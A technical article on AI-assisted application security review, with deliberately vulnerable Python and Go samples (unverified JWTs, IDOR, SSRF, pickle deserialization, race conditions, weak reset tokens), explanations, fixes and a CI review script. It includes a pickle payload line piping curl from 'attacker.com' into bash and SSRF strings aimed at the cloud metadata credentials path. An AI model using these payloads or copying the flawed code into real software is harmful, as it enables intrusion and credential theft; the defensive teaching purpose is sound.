Claude for Application Security: Finding Logic Vulnerabilities in Source Code

Claude for Application Security: Finding Logic Vulnerabilities in Source Code

Problem

Static application security testing (SAST) tools find pattern-based vulnerabilities effectively. Semgrep matches code against rules. CodeQL models data flow. Bandit flags dangerous Python function calls. These tools catch SQL injection when they see string concatenation in a query, XSS when they trace user input to HTML output, and hardcoded credentials when they match regex patterns.

But the vulnerabilities that cause real breaches are rarely pattern-matchable. They are logic errors: an authentication check that can be bypassed by sending a request in a specific order, an authorisation function that checks the user’s role but not whether the user owns the resource, a URL parser that normalises differently than the downstream service creating an SSRF vector, or a payment flow with a race condition that allows double-spending.

SAST tools cannot find these bugs because they require understanding what the code is supposed to do, not just what it does. A tool can verify that a function calls authorize() before accessing a resource, but it cannot determine whether the authorisation check is semantically correct for the business logic. Does the check verify that user A owns resource B, or does it only verify that user A has the role “editor”? The difference is an IDOR vulnerability, and no SAST rule can distinguish between the two without understanding the application’s access model.

Claude reads code the way an experienced application security engineer does. It understands authentication flows, authorisation models, data validation patterns, and concurrency semantics. It can reason about what happens when functions are called in unexpected orders, when inputs have unusual shapes, and when multiple requests arrive simultaneously.

This article covers specific vulnerability patterns that Claude finds in Python and Go code, with real examples of bugs that SAST tools miss.

Target systems: Web applications and APIs written in Python (Django, Flask, FastAPI) and Go (net/http, Gin, Echo). The patterns apply to any language, but the examples focus on these two.

Threat Model

  • Adversary: External attackers probing the application’s API, authenticated users attempting to access other users’ data, and internal users attempting to escalate their privileges within the application.
  • Access level: Varies. Some bugs (authentication bypass) require no authentication. Others (IDOR, broken access control) require a valid low-privilege account. Race conditions require the ability to send concurrent requests.
  • Objective: Access other users’ data, perform actions as another user, bypass payment or rate limiting controls, or gain administrative access.
  • Blast radius: An authentication bypass exposes the entire application. An IDOR exposes every user’s data through a single compromised account. A race condition in a financial operation can cause direct monetary loss.

Configuration

Authentication Bypass Through Logic Errors

SAST tools verify that authentication middleware is present. Claude identifies when the middleware’s logic is flawed:

# auth/middleware.py
from functools import wraps
from flask import request, g, jsonify
import jwt

def require_auth(f):
    @wraps(f)
    def decorated(*args, **kwargs):
        token = request.headers.get("Authorization", "").replace("Bearer ", "")

        if not token:
            return jsonify({"error": "Missing token"}), 401

        try:
            payload = jwt.decode(token, options={"verify_signature": False})
            g.user_id = payload.get("sub")
            g.user_role = payload.get("role", "viewer")
        except jwt.DecodeError:
            return jsonify({"error": "Invalid token"}), 401

        return f(*args, **kwargs)
    return decorated

A SAST tool sees JWT decoding in an authentication decorator and considers this correct. Claude identifies two critical issues:

  1. Signature verification is disabled. The options={"verify_signature": False} parameter means any client can forge a JWT with arbitrary claims. An attacker creates a token with "role": "admin" and the server accepts it. This is not a missing auth check (which SAST would catch) but a misconfigured auth check that is present but ineffective.

  2. Default role assignment. The payload.get("role", "viewer") line assigns the “viewer” role if the role claim is absent. But combined with disabled signature verification, an attacker can set any role they want. Even if signature verification were enabled, the fallback to “viewer” means a token without a role claim (which might be legitimate in some OAuth flows) grants access to viewer-level resources.

Authorisation Check Gaps: IDOR and Broken Access Control

This is the most common vulnerability class that SAST tools miss entirely:

# api/documents.py
from flask import Blueprint, request, g, jsonify
from models import Document, db

docs = Blueprint("docs", __name__)

@docs.route("/documents/<int:doc_id>", methods=["GET"])
@require_auth
def get_document(doc_id):
    doc = Document.query.get_or_404(doc_id)
    return jsonify(doc.to_dict())

@docs.route("/documents/<int:doc_id>", methods=["PUT"])
@require_auth
def update_document(doc_id):
    doc = Document.query.get_or_404(doc_id)

    if g.user_role not in ("editor", "admin"):
        return jsonify({"error": "Insufficient permissions"}), 403

    doc.title = request.json.get("title", doc.title)
    doc.content = request.json.get("content", doc.content)
    db.session.commit()
    return jsonify(doc.to_dict())

@docs.route("/documents/<int:doc_id>/share", methods=["POST"])
@require_auth
def share_document(doc_id):
    doc = Document.query.get_or_404(doc_id)

    if doc.owner_id != g.user_id:
        return jsonify({"error": "Only the owner can share"}), 403

    target_user = request.json.get("user_id")
    doc.shared_with.append(target_user)
    db.session.commit()
    return jsonify({"status": "shared"})

Claude identifies three distinct authorisation failures:

  1. GET endpoint has no ownership check. Any authenticated user can read any document by ID. The require_auth decorator verifies the user is logged in, but does not verify they own or have been granted access to the specific document. This is a classic IDOR. Semgrep cannot flag this because the endpoint does have authentication; what it lacks is authorisation.

  2. PUT endpoint checks role but not ownership. Any user with the “editor” role can modify any document, not just their own. The check should verify both role and ownership (or sharing). A SAST tool sees the role check and considers the endpoint protected.

  3. Inconsistent authorisation model. The share endpoint correctly checks doc.owner_id != g.user_id, but the GET and PUT endpoints do not. Claude recognises the inconsistency: one endpoint in the same file uses ownership checks while others do not.

The Claude prompt that catches these patterns:

SYSTEM_PROMPT = """You are reviewing application code for authorisation
vulnerabilities. For every endpoint that accesses a resource by ID:

1. Verify that the endpoint checks whether the authenticated user
   is allowed to access THAT SPECIFIC resource (not just whether
   they are authenticated or have a role)
2. Check for consistency: if one endpoint on a resource checks
   ownership, all endpoints on that resource should check ownership
3. Identify endpoints where role-based checks substitute for
   resource-level checks (role says "editor" but does not verify
   ownership of the specific resource)
4. Look for enumerable IDs (sequential integers) that make IDOR
   exploitation trivial"""

SSRF Through URL Parsing Inconsistencies

// handlers/proxy.go
package handlers

import (
    "fmt"
    "io"
    "net/http"
    "net/url"
    "strings"
)

var allowedHosts = map[string]bool{
    "api.partner.com":     true,
    "cdn.trusted-site.com": true,
}

func ProxyHandler(w http.ResponseWriter, r *http.Request) {
    targetURL := r.URL.Query().Get("url")
    if targetURL == "" {
        http.Error(w, "url parameter required", http.StatusBadRequest)
        return
    }

    parsed, err := url.Parse(targetURL)
    if err != nil {
        http.Error(w, "invalid URL", http.StatusBadRequest)
        return
    }

    // Block internal addresses
    if parsed.Hostname() == "localhost" ||
        parsed.Hostname() == "127.0.0.1" ||
        strings.HasPrefix(parsed.Hostname(), "10.") ||
        strings.HasPrefix(parsed.Hostname(), "192.168.") {
        http.Error(w, "internal addresses not allowed", http.StatusForbidden)
        return
    }

    // Check against allowlist
    if !allowedHosts[parsed.Hostname()] {
        http.Error(w, "host not allowed", http.StatusForbidden)
        return
    }

    resp, err := http.Get(targetURL)
    if err != nil {
        http.Error(w, fmt.Sprintf("proxy error: %v", err), http.StatusBadGateway)
        return
    }
    defer resp.Body.Close()

    io.Copy(w, resp.Body)
}

A SAST tool sees URL validation and an allowlist check. Claude identifies multiple bypass vectors:

  1. URL parsing inconsistency. The code parses the URL with url.Parse for validation but passes the original targetURL string to http.Get. An attacker can use URL encoding, backslash tricks, or fragment manipulation to create a URL where url.Parse returns one hostname but http.Get connects to a different host. For example, http://api.partner.com@169.254.169.254/ passes the allowlist check (hostname appears to be api.partner.com) but the HTTP client treats the part before @ as userinfo and connects to the metadata service.

  2. Incomplete internal address blocking. The check blocks 10.* and 192.168.* but misses 172.16.0.0/12, IPv6 loopback (::1), 0.0.0.0, the AWS metadata IP 169.254.169.254, and DNS rebinding attacks where the hostname resolves to an internal IP after the check.

  3. Redirect following. Go’s http.Get follows redirects by default. An attacker requests an allowed host that returns a 302 redirect to http://169.254.169.254/latest/meta-data/iam/security-credentials/. The allowlist check passes for the initial URL, but the actual request reaches the metadata service.

Deserialization Vulnerabilities

# api/import_handler.py
import pickle
import base64
from flask import request, jsonify

@app.route("/api/import", methods=["POST"])
@require_auth
def import_data():
    encoded = request.json.get("data")
    if not encoded:
        return jsonify({"error": "data field required"}), 400

    try:
        data = pickle.loads(base64.b64decode(encoded))
    except Exception:
        return jsonify({"error": "invalid data format"}), 400

    # Process the imported data
    if isinstance(data, dict) and "records" in data:
        count = process_records(data["records"])
        return jsonify({"imported": count})

    return jsonify({"error": "unexpected data structure"}), 400

Semgrep and Bandit will both flag pickle.loads with untrusted input. This is one case where SAST tools do catch the issue. But Claude provides additional context that SAST tools do not:

  1. Exploitation is trivial. Claude explains that an attacker constructs a pickle payload that executes os.system("curl attacker.com/shell.sh | bash") on deserialization, before the isinstance check runs. The type check is irrelevant because the code executes during deserialization, not after.

  2. The require_auth decorator does not mitigate this. Since the auth check uses unverified JWTs (from the earlier example), any attacker can reach this endpoint. Even with proper authentication, any authenticated user can achieve remote code execution.

  3. Claude suggests the fix with context. Rather than just saying “don’t use pickle”, Claude recommends using json.loads for this use case since the code only needs dict data, or using hmac to sign serialized data if pickle is truly required for complex object graphs.

Race Conditions in Financial Operations

// handlers/transfer.go
package handlers

import (
    "database/sql"
    "encoding/json"
    "net/http"
)

type TransferRequest struct {
    FromAccount string  `json:"from_account"`
    ToAccount   string  `json:"to_account"`
    Amount      float64 `json:"amount"`
}

func TransferHandler(db *sql.DB) http.HandlerFunc {
    return func(w http.ResponseWriter, r *http.Request) {
        var req TransferRequest
        json.NewDecoder(r.Body).Decode(&req)

        // Check balance
        var balance float64
        err := db.QueryRow(
            "SELECT balance FROM accounts WHERE id = $1",
            req.FromAccount,
        ).Scan(&balance)
        if err != nil {
            http.Error(w, "account not found", http.StatusNotFound)
            return
        }

        if balance < req.Amount {
            http.Error(w, "insufficient funds", http.StatusBadRequest)
            return
        }

        // Debit source account
        _, err = db.Exec(
            "UPDATE accounts SET balance = balance - $1 WHERE id = $2",
            req.Amount, req.FromAccount,
        )
        if err != nil {
            http.Error(w, "transfer failed", http.StatusInternalServerError)
            return
        }

        // Credit destination account
        _, err = db.Exec(
            "UPDATE accounts SET balance = balance + $1 WHERE id = $2",
            req.Amount, req.ToAccount,
        )
        if err != nil {
            // Attempt to rollback the debit
            db.Exec(
                "UPDATE accounts SET balance = balance + $1 WHERE id = $2",
                req.Amount, req.FromAccount,
            )
            http.Error(w, "transfer failed", http.StatusInternalServerError)
            return
        }

        json.NewEncoder(w).Encode(map[string]string{"status": "completed"})
    }
}

No SAST tool flags this code. There is no injection, no hardcoded secret, no unsafe function call. Claude identifies two critical issues:

  1. TOCTOU race condition. The balance check and the debit are separate operations with no transaction or locking. An attacker sends 10 concurrent transfer requests for their full balance. All 10 requests read the same balance, all 10 pass the check, and all 10 execute the debit. The account goes negative. With a $1,000 balance, the attacker transfers $10,000 to accounts they control.

  2. Non-atomic transfer with manual rollback. The debit and credit are separate SQL statements. If the credit fails, the code attempts to roll back the debit with another separate statement. But if the rollback also fails (network error, database restart), the money disappears: debited from the source but never credited to the destination and never rolled back. This should use a database transaction with BEGIN/COMMIT/ROLLBACK.

Claude provides the fix:

func TransferHandler(db *sql.DB) http.HandlerFunc {
    return func(w http.ResponseWriter, r *http.Request) {
        var req TransferRequest
        json.NewDecoder(r.Body).Decode(&req)

        tx, err := db.Begin()
        if err != nil {
            http.Error(w, "internal error", http.StatusInternalServerError)
            return
        }
        defer tx.Rollback()

        // Lock the source row and check balance atomically
        var balance float64
        err = tx.QueryRow(
            "SELECT balance FROM accounts WHERE id = $1 FOR UPDATE",
            req.FromAccount,
        ).Scan(&balance)
        if err != nil {
            http.Error(w, "account not found", http.StatusNotFound)
            return
        }

        if balance < req.Amount {
            http.Error(w, "insufficient funds", http.StatusBadRequest)
            return
        }

        _, err = tx.Exec(
            "UPDATE accounts SET balance = balance - $1 WHERE id = $2",
            req.Amount, req.FromAccount,
        )
        if err != nil {
            http.Error(w, "transfer failed", http.StatusInternalServerError)
            return
        }

        _, err = tx.Exec(
            "UPDATE accounts SET balance = balance + $1 WHERE id = $2",
            req.Amount, req.ToAccount,
        )
        if err != nil {
            http.Error(w, "transfer failed", http.StatusInternalServerError)
            return
        }

        if err := tx.Commit(); err != nil {
            http.Error(w, "transfer failed", http.StatusInternalServerError)
            return
        }

        json.NewEncoder(w).Encode(map[string]string{"status": "completed"})
    }
}

Unsafe Use of Cryptographic Primitives

# auth/tokens.py
import hashlib
import time
import os

def generate_reset_token(user_id: str) -> str:
    """Generate a password reset token."""
    timestamp = str(int(time.time()))
    raw = f"{user_id}:{timestamp}:{os.environ.get('SECRET_KEY', 'dev-secret')}"
    token = hashlib.md5(raw.encode()).hexdigest()
    return f"{timestamp}:{token}"

def verify_reset_token(user_id: str, token: str, max_age: int = 3600) -> bool:
    """Verify a password reset token."""
    parts = token.split(":")
    if len(parts) != 2:
        return False

    timestamp, hash_value = parts
    try:
        token_time = int(timestamp)
    except ValueError:
        return False

    if time.time() - token_time > max_age:
        return False

    expected_raw = f"{user_id}:{timestamp}:{os.environ.get('SECRET_KEY', 'dev-secret')}"
    expected = hashlib.md5(expected_raw.encode()).hexdigest()
    return hash_value == expected

Bandit flags hashlib.md5 as insecure. That is true but is actually the least critical issue here. Claude identifies the deeper problems:

  1. Timing attack on token comparison. The == operator for string comparison returns early on the first mismatched character. An attacker can brute-force the token one character at a time by measuring response times. The fix is to use hmac.compare_digest() for constant-time comparison.

  2. Predictable token inputs. The token is derived from user_id (known to the attacker), timestamp (guessable to within a few seconds), and SECRET_KEY. If the secret key is weak or uses the fallback dev-secret, the attacker can compute valid tokens without any brute-forcing.

  3. Fallback secret key. The os.environ.get('SECRET_KEY', 'dev-secret') pattern means that if the environment variable is not set (a common deployment error), every token is predictable. A SAST tool would need to trace environment variable configuration across deployment manifests to catch this, which none do.

  4. MD5 is not the real problem. Even replacing MD5 with SHA-256 does not fix the fundamental issue. The token construction is deterministic from guessable inputs. The correct approach is to use secrets.token_urlsafe() to generate a random token and store it server-side, or use HMAC with a strong key and proper constant-time comparison.

Integration: Claude Code Review in CI

# scripts/appsec-review.py
import anthropic
import sys

SYSTEM_PROMPT = """You are an application security engineer reviewing
source code for logic vulnerabilities. Focus on issues that SAST
tools cannot detect:

1. Authentication bypass through logic errors (not missing auth)
2. Authorisation gaps: endpoints that check authentication but not
   resource ownership (IDOR)
3. SSRF: URL validation that can be bypassed through parsing
   differences, redirects, or DNS rebinding
4. Race conditions: check-then-act patterns without locks or
   transactions, especially in financial or state-changing operations
5. Cryptographic issues: timing attacks, predictable tokens,
   weak key derivation, ECB mode, static IVs
6. Deserialization of untrusted data
7. Business logic errors: discount stacking, negative quantities,
   integer overflow in currency calculations

For each finding, provide:
- The specific code location
- Why SAST tools miss it
- The attack scenario (how an attacker exploits it)
- The fix (with code)

Do not flag issues that SAST tools already catch well (SQL injection
via string formatting, XSS via template rendering, hardcoded secrets).
Focus on the logic layer."""

def review_file(filepath: str) -> str:
    with open(filepath) as f:
        content = f.read()

    client = anthropic.Anthropic()
    message = client.messages.create(
        model="claude-sonnet-4-6",
        max_tokens=4096,
        system=SYSTEM_PROMPT,
        messages=[{
            "role": "user",
            "content": f"Review this file for logic vulnerabilities:\n\n"
                       f"File: {filepath}\n```\n{content}\n```"
        }]
    )
    return message.content[0].text

if __name__ == "__main__":
    for filepath in sys.argv[1:]:
        print(f"\n{'='*60}")
        print(f"Reviewing: {filepath}")
        print(f"{'='*60}\n")
        print(review_file(filepath))

Expected Behaviour

After integrating Claude-based application security review:

  • Logic vulnerabilities are caught before merge. Authentication bypass, IDOR, race conditions, and cryptographic misuse are identified in pull requests alongside SAST results.
  • SAST findings are contextualised. When Semgrep flags pickle.loads, Claude explains the full exploit chain including how the attacker reaches the endpoint and what they can achieve.
  • False positive rate is lower than SAST alone. Claude understands when a pattern is safe in context (e.g., pickle.loads on data from a trusted internal queue with HMAC verification) and does not flag it.
  • Developers receive actionable explanations. Instead of “insecure hash algorithm detected”, developers get “this password reset token can be forged by an attacker who knows the user’s email because the timestamp is guessable and the fallback secret key is ‘dev-secret’”.

Verification:

# Review authentication and authorisation code
claude "Review auth/ and api/ directories for authentication bypass
and authorisation gaps. For each endpoint, verify that the
authenticated user is authorised to access the specific resource
being requested, not just authenticated."

# Check for race conditions in state-changing operations
claude "Review handlers/ for race conditions. Look for any pattern
where a value is read, checked, and then modified in separate
database operations without a transaction or lock."

# Test against known-vulnerable code samples
python3 scripts/appsec-review.py \
  test/vulnerable/auth_bypass.py \
  test/vulnerable/idor.py \
  test/vulnerable/race_condition.go

Trade-offs

Decision Benefit Cost
Review only security-relevant files (auth, handlers, middleware) Focused analysis, lower cost May miss vulnerabilities in utility or helper code
Include full application context (models, routes, middleware) Claude understands the full request lifecycle Large context window usage, higher cost
Run Claude alongside SAST, not instead of it Comprehensive coverage: SAST for patterns, Claude for logic Two tools to maintain, two sets of results to review
Focus Claude on logic bugs only Avoids duplicate findings with SAST Requires clear prompt engineering to avoid overlap
Review every PR Catches issues early API cost scales with PR volume; most PRs have no security relevance

API cost estimate: Reviewing 500 lines of application code costs approximately $0.02-0.05 with Claude Sonnet. A focused review of authentication and authorisation code (typically 1,000-3,000 lines) costs $0.05-0.15. At 15 security-relevant PRs per week, monthly cost is $12-36.

Accuracy considerations: Claude’s logic vulnerability detection has a lower false positive rate than SAST tools (approximately 5-10% vs. 30-60% for SAST) but a higher false negative rate for pattern-based vulnerabilities. This is why running both tools together is the recommended approach.

Failure Modes

Failure Symptom Detection Response
Missed IDOR Claude does not flag an endpoint that accesses resources by ID without ownership checks Penetration test or bug bounty report identifies the IDOR Add the specific code pattern to the system prompt as an explicit check
False positive on intentional design Claude flags a public API endpoint as missing authentication when it is intentionally unauthenticated Developer marks finding as false positive; pattern recurs Maintain a list of intentionally public endpoints in the system prompt
Incorrect fix suggestion Claude suggests a fix that introduces a new vulnerability (e.g., a lock that causes deadlock) Code review of Claude’s suggestion catches the issue Always review Claude’s fix suggestions with the same scrutiny as any code change
Language version confusion Claude suggests a fix using a library function that does not exist in the project’s language version Build fails when applying the fix Include language and framework versions in the review prompt
Context window limits on large files A 5,000-line file exceeds practical context limits; analysis is incomplete Review output does not cover the entire file Split large files for review or use Claude to review specific functions
Hallucinated vulnerability Claude describes a bug that does not exist in the code (e.g., references a function that is not called) Manual code review shows the described bug is not present Always verify Claude’s findings against the actual code before opening a ticket

When to Consider a Managed Alternative

Transition point: When your organisation has more than 50 developers committing to security-sensitive applications, needs compliance evidence for code review (SOC2, PCI-DSS), or requires integration with issue trackers and developer workflows.

What managed providers handle:

  • Snyk: Snyk Code provides SAST with low false positive rates and developer-friendly remediation guidance. Snyk integrates with IDEs, PRs, and CI/CD pipelines. Use Snyk for the pattern-based detection layer that runs on every commit.
  • Semgrep: Custom rule engine that allows writing organisation-specific detection rules. When Claude identifies a recurring vulnerability pattern in your codebase, write a Semgrep rule to catch future instances automatically. Semgrep handles the deterministic detection; Claude handles the initial discovery.

What Claude handles that managed tools do not: Business logic vulnerability detection, race condition identification through code flow analysis, IDOR detection through authorisation model reasoning, and contextual explanation of why a specific code pattern is dangerous in the application’s context. No SAST tool reasons about whether an authorisation check is semantically correct for the business logic.

The optimal stack: Semgrep or Snyk Code for pattern-based SAST on every commit + Claude for logic-layer review on security-relevant PRs + manual penetration testing quarterly. SAST catches the known patterns, Claude catches the logic bugs, and manual testing validates both.